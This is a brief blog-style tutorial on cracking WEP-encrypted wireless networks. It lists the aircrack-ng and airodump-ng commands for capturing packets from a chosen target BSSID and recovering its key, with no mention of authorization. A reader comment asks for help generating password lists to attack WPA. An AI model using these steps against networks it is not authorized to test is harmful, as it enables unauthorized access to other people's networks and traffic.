Howto: crack a wireless network with Wired Equivalent Privacy (WEP)
WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia
It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.
Install aircrack-ng – on Debian or Ubuntu by:
sudo apt-get install aircrack-ng
(or yum install aircrack-ng on fedora)
Or get the source from the homepage. (suse users will have to use the source)
Then start aircrack-ng to look for wireless networks:
sudo airodump-ng eth1
Then notice the channel number of the wireless network you want to crack.
Quit aircrack-ng and start it again with med specific channel number to collect packages faster:
sudo airodump-ng -c 4 -w dump eth1
Then wait and let it collect about 500K IVS and the try the do the actual crack:
sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap
The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.
Related Posts
I used Backtrack2 for this purpose. WEP is easy after all, but WPA is hard. Do you happen to know a good and flexible password file generator?